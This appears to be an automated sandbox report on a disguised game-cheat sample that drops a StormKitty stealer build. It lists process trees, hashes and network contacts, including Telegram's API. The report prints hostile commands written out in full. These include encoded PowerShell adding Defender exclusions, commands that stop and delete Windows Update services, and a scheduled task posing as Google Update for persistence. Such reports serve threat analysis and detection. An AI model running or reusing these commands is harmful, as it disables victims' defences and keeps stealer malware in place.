PID 2588 wrote to memory of 2632 | N/A | C:\Users\Admin\AppData\Local\Temp\rustcheat.exe | C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe
PID 2588 wrote to memory of 2632 | N/A | C:\Users\Admin\AppData\Local\Temp\rustcheat.exe | C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe
PID 2588 wrote to memory of 2632 | N/A | C:\Users\Admin\AppData\Local\Temp\rustcheat.exe | C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe
PID 2588 wrote to memory of 2632 | N/A | C:\Users\Admin\AppData\Local\Temp\rustcheat.exe | C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe
PID 2232 wrote to memory of 1920 | N/A | C:\Users\Admin\AppData\Local\Temp\testy.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2232 wrote to memory of 1920 | N/A | C:\Users\Admin\AppData\Local\Temp\testy.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2232 wrote to memory of 1920 | N/A | C:\Users\Admin\AppData\Local\Temp\testy.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2232 wrote to memory of 2132 | N/A | C:\Users\Admin\AppData\Local\Temp\testy.exe | C:\Windows\System32\cmd.exe
PID 2232 wrote to memory of 2132 | N/A | C:\Users\Admin\AppData\Local\Temp\testy.exe | C:\Windows\System32\cmd.exe
PID 2232 wrote to memory of 2132 | N/A | C:\Users\Admin\AppData\Local\Temp\testy.exe | C:\Windows\System32\cmd.exe
PID 2232 wrote to memory of 2732 | N/A | C:\Users\Admin\AppData\Local\Temp\testy.exe | C:\Windows\System32\cmd.exe
PID 2232 wrote to memory of 2732 | N/A | C:\Users\Admin\AppData\Local\Temp\testy.exe | C:\Windows\System32\cmd.exe
PID 2232 wrote to memory of 2732 | N/A | C:\Users\Admin\AppData\Local\Temp\testy.exe | C:\Windows\System32\cmd.exe
PID 2132 wrote to memory of 2876 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\sc.exe
PID 2132 wrote to memory of 2876 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\sc.exe
PID 2132 wrote to memory of 2876 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\sc.exe
PID 2132 wrote to memory of 1804 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\sc.exe
PID 2132 wrote to memory of 1804 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\sc.exe
PID 2132 wrote to memory of 1804 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\sc.exe
PID 2732 wrote to memory of 2720 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\powercfg.exe
PID 2732 wrote to memory of 2720 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\powercfg.exe
PID 2732 wrote to memory of 2720 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\powercfg.exe
PID 2132 wrote to memory of 2728 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\sc.exe
PID 2132 wrote to memory of 2728 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\sc.exe
PID 2132 wrote to memory of 2728 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\sc.exe
PID 2132 wrote to memory of 2760 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\sc.exe
PID 2132 wrote to memory of 2760 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\sc.exe
PID 2132 wrote to memory of 2760 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\sc.exe
PID 2732 wrote to memory of 2784 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\powercfg.exe
PID 2732 wrote to memory of 2784 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\powercfg.exe
PID 2732 wrote to memory of 2784 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\powercfg.exe
PID 2132 wrote to memory of 2436 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\sc.exe
PID 2132 wrote to memory of 2436 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\sc.exe
PID 2132 wrote to memory of 2436 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\sc.exe
PID 2132 wrote to memory of 2372 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\reg.exe
PID 2132 wrote to memory of 2372 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\reg.exe
PID 2132 wrote to memory of 2372 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\reg.exe
PID 2132 wrote to memory of 1632 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\reg.exe
PID 2132 wrote to memory of 1632 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\reg.exe
PID 2132 wrote to memory of 1632 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\reg.exe
PID 2732 wrote to memory of 2712 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\powercfg.exe
PID 2732 wrote to memory of 2712 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\powercfg.exe
PID 2732 wrote to memory of 2712 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\powercfg.exe
PID 2132 wrote to memory of 840 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\reg.exe
PID 2132 wrote to memory of 840 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\reg.exe
PID 2132 wrote to memory of 840 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\reg.exe
PID 2132 wrote to memory of 2688 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\reg.exe
PID 2132 wrote to memory of 2688 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\reg.exe
PID 2132 wrote to memory of 2688 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\reg.exe
PID 2132 wrote to memory of 2596 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\reg.exe
PID 2132 wrote to memory of 2596 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\reg.exe
PID 2132 wrote to memory of 2596 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\reg.exe
PID 2732 wrote to memory of 1784 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\powercfg.exe
PID 2732 wrote to memory of 1784 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\powercfg.exe
PID 2732 wrote to memory of 1784 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\powercfg.exe
PID 2132 wrote to memory of 1496 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\takeown.exe
PID 2132 wrote to memory of 1496 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\takeown.exe
PID 2132 wrote to memory of 1496 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\takeown.exe
PID 2132 wrote to memory of 2900 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\icacls.exe
PID 2132 wrote to memory of 2900 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\icacls.exe

Processes

C:\Users\Admin\AppData\Local\Temp\rustcheat.exe

"C:\Users\Admin\AppData\Local\Temp\rustcheat.exe"

C:\Users\Admin\AppData\Local\Temp\testy.exe

"C:\Users\Admin\AppData\Local\Temp\testy.exe"

C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe

"C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAYgB1AGUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAagBlAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAeQBiAG8AcgAjAD4A"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop UsoSvc

C:\Windows\system32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\system32\sc.exe

sc stop wuauserv

C:\Windows\system32\sc.exe

sc stop bits

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop dosvc

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\WaaSMedicSvc.dll

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe\""

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe\""

C:\Windows\system32\schtasks.exe

schtasks /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\system32\taskeng.exe

taskeng.exe {34F6453D-8D3B-45D6-AC0B-C71CD6791D8A} S-1-5-21-377084978-2088738870-2818360375-1000:DSWJWADP\Admin:Interactive:[1]

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpCE85.tmp.bat

C:\Windows\system32\chcp.com

chcp 65001

C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe

C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe

C:\Windows\system32\taskkill.exe

TaskKill /F /IM 2632

C:\Windows\system32\timeout.exe

Timeout /T 2 /Nobreak

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAYgB1AGUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAagBlAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAeQBiAG8AcgAjAD4A"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\system32\sc.exe

sc stop UsoSvc

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe "ofrnufvwokgx"

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\system32\sc.exe

sc stop wuauserv

C:\Windows\system32\sc.exe

sc stop bits

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop dosvc

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\WaaSMedicSvc.dll

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAcwBnACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAZgByAGcAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcAB2AGcAIwA+AA=="

C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe

"C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAYgB1AGUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAagBlAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAeQBiAG8AcgAjAD4A"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop UsoSvc

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\system32\sc.exe

sc stop wuauserv

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop bits

C:\Windows\system32\sc.exe

sc stop dosvc

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\WaaSMedicSvc.dll

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE

Network

Country Destination Domain Proto
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp

Files

\Users\Admin\AppData\Local\Temp\testy.exe

MD5 50bfdd2eb713e8b5ef0899848159542e
SHA1 df80dcd51ec4af47f286f778e8d7f19dedc4d3b8
SHA256 1388cca1ca24c66583a6c1114c534745ed0fec7cb498b4129b6864f774a72d61
SHA512 d5b074e04fb52f010baed42c8f8bad60fbf394843fa5805d553903b1722c517dd97352f2d722605e4e14b5bff24415594dc2f7754ce2d7be8af844f9e4bd48fc

C:\Users\Admin\AppData\Local\Temp\testy.exe

MD5 50bfdd2eb713e8b5ef0899848159542e
SHA1 df80dcd51ec4af47f286f778e8d7f19dedc4d3b8
SHA256 1388cca1ca24c66583a6c1114c534745ed0fec7cb498b4129b6864f774a72d61
SHA512 d5b074e04fb52f010baed42c8f8bad60fbf394843fa5805d553903b1722c517dd97352f2d722605e4e14b5bff24415594dc2f7754ce2d7be8af844f9e4bd48fc

C:\Users\Admin\AppData\Local\Temp\testy.exe

MD5 50bfdd2eb713e8b5ef0899848159542e
SHA1 df80dcd51ec4af47f286f778e8d7f19dedc4d3b8
SHA256 1388cca1ca24c66583a6c1114c534745ed0fec7cb498b4129b6864f774a72d61
SHA512 d5b074e04fb52f010baed42c8f8bad60fbf394843fa5805d553903b1722c517dd97352f2d722605e4e14b5bff24415594dc2f7754ce2d7be8af844f9e4bd48fc

C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe

MD5 7b8fcb29905e045b7f8c1dc9bc305698
SHA1 1f8f2b29447f871b7b76f6bfb299d1f8c56f2fc8
SHA256 70eca85476c7ddb1f416bdc2678bafb5998d80f5d8da27a4339971b6f0693173
SHA512 d4f4c491bf4ea187f4a41c4b091935dde4c65300494c8d9dd3a242a03e92191b6789f17ffdaf06dbfb967988c2ba2671687b7a14c23682fc3972165df726a0b2

